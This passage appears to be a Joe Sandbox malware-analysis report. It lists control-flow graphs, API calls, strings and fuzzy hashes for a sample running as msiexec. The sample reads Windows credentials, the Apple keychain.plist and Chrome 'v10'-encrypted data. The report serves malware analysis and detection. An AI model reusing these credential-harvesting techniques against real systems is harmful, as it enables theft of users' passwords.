37844->37840 37844->37842 37845 4175b7 37844->37845 37846 4175d6 CloseHandle 37845->37846 37847 4175c8 37846->37847 37848 4175df 37846->37848 37847->37848 37849 4175ce Sleep 37847->37849 37848->37844 37849->37846 37850->37842 39755 4147f3 39758 414561 39755->39758 39757 414813 39759 41456d 39758->39759 39760 41457f GetPrivateProfileIntW 39758->39760 39763 4143f1 memset _itow WritePrivateProfileStringW 39759->39763 39760->39757 39762 41457a 39762->39757 39763->39762

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 357 40de74-40de78 356->357 358 40de65-40de6c 356->358 357->352 357->356 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 377 40dffd-40e006 372->377 375 40df08 373->375 376 40dfef-40dff2 CloseHandle 373->376 374->370 374->377 378 40df0b-40df10 375->378 376->372 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->376 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040DDAD
                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                          • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                          • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                          • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                          • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                          • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                          • memset.MSVCRT ref: 0040DF5F
                                                                                          • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                          • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                          • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                          • API String ID: 708747863-3398334509
                                                                                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 651 413e79-413e9d call 413959 call 413ca4 643->651 652 413e28-413e35 643->652 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 free 644->647 649 413edb-413ee2 646->649 647->649 655 413ee4 649->655 656 413ee7-413efe 649->656 663 413ea2-413eae CloseHandle 651->663 653 413e61-413e68 652->653 654 413e37-413e44 GetModuleHandleW 652->654 653->651 660 413e6a-413e76 653->660 654->653 659 413e46-413e5c GetProcAddress 654->659 655->656 656->639 659->653 660->651 663->642
                                                                                          APIs
                                                                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                          • memset.MSVCRT ref: 00413D7F
                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                          • memset.MSVCRT ref: 00413E07
                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                          • free.MSVCRT ref: 00413EC1
                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                          • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                          • API String ID: 1344430650-1740548384
                                                                                          • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                          • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                          APIs
                                                                                          • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                          • String ID:
                                                                                          • API String ID: 3473537107-0
                                                                                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                          APIs
                                                                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                            • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                          • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                          • free.MSVCRT ref: 00418803
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                          • String ID:
                                                                                          • API String ID: 1355100292-0
                                                                                          • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                          • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$FirstNext
                                                                                          • String ID:
                                                                                          • API String ID: 1690352074-0
                                                                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0041898C
                                                                                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoSystemmemset
                                                                                          • String ID:
                                                                                          • API String ID: 3558857096-0
                                                                                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 142 445849 71->142 94 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->94 95 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->95 146 44589f 85->146 86->54 89 44568b-4456a4 call 40a9b5 call 4087b3 87->89 107 4456ba-4456c4 88->107 148 4456a9-4456b0 89->148 165 445d67-445d6c 94->165 166 445d71-445d83 call 445093 94->166 196 445e17 95->196 197 445e1e-445e25 95->197 121 4457f9 107->121 122 4456ca-4456d3 call 413cfa call 413d4c 107->122 121->6 174 4456d8-4456f7 call 40b2cc call 413fa6 122->174 139->140 140->23 142->56 146->67 148->88 148->89 154->107 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->76 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 004455C2
                                                                                          • wcsrchr.MSVCRT ref: 004455DA
                                                                                          • memset.MSVCRT ref: 0044570D
                                                                                          • memset.MSVCRT ref: 00445725
                                                                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                            • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                            • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                          • memset.MSVCRT ref: 0044573D
                                                                                          • memset.MSVCRT ref: 00445755
                                                                                          • memset.MSVCRT ref: 004458CB
                                                                                          • memset.MSVCRT ref: 004458E3
                                                                                          • memset.MSVCRT ref: 0044596E
                                                                                          • memset.MSVCRT ref: 00445A10
                                                                                          • memset.MSVCRT ref: 00445A28
                                                                                          • memset.MSVCRT ref: 00445AC6
                                                                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                          • memset.MSVCRT ref: 00445B52
                                                                                          • memset.MSVCRT ref: 00445B6A
                                                                                          • memset.MSVCRT ref: 00445C9B
                                                                                          • memset.MSVCRT ref: 00445CB3
                                                                                          • _wcsicmp.MSVCRT ref: 00445D56
                                                                                          • memset.MSVCRT ref: 00445B82
                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                          • memset.MSVCRT ref: 00445986
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                          • API String ID: 2263259095-3798722523
                                                                                          • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                          • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                          • String ID: $/deleteregkey$/savelangfile
                                                                                          • API String ID: 2744995895-28296030
                                                                                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040B71C
                                                                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                          • wcsrchr.MSVCRT ref: 0040B738
                                                                                          • memset.MSVCRT ref: 0040B756
                                                                                          • memset.MSVCRT ref: 0040B7F5
                                                                                          • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                          • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                          • memset.MSVCRT ref: 0040B851
                                                                                          • memset.MSVCRT ref: 0040B8CA
                                                                                          • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                          • memset.MSVCRT ref: 0040BB53
                                                                                          • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                          • String ID: chp$v10
                                                                                          • API String ID: 4290143792-2783969131
                                                                                          • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                          • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 505 40e2ab-40e2ce call 40695d call 406b90 509 40e2d3-40e2d5 505->509 510 40e4a0-40e4af call 4069a3 509->510 511 40e2db-40e300 509->511 512 40e304-40e316 call 406e8f 511->512 517 40e476-40e483 call 406b53 512->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->512 525->510 530 40e497-40e49f free 525->530 530->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 552 40e3b0 543->552 553 40e3b3-40e3c1 wcschr 543->553 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 550 40e3fb-40e40c memcpy 549->550 551 40e40f-40e414 549->551 550->551 554 40e416-40e427 memcpy 551->554 555 40e42a-40e42f 551->555 552->553 553->542 556 40e3c3-40e3c6 553->556 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                                                          APIs
                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                          • free.MSVCRT ref: 0040E49A
                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                          • memset.MSVCRT ref: 0040E380
                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                          • wcschr.MSVCRT ref: 0040E3B8
                                                                                          • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,771B2EE0), ref: 0040E3EC
                                                                                          • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,771B2EE0), ref: 0040E407
                                                                                          • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,771B2EE0), ref: 0040E422
                                                                                          • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,771B2EE0), ref: 0040E43D
                                                                                          Strings
                                                                                          Memory Dump Source
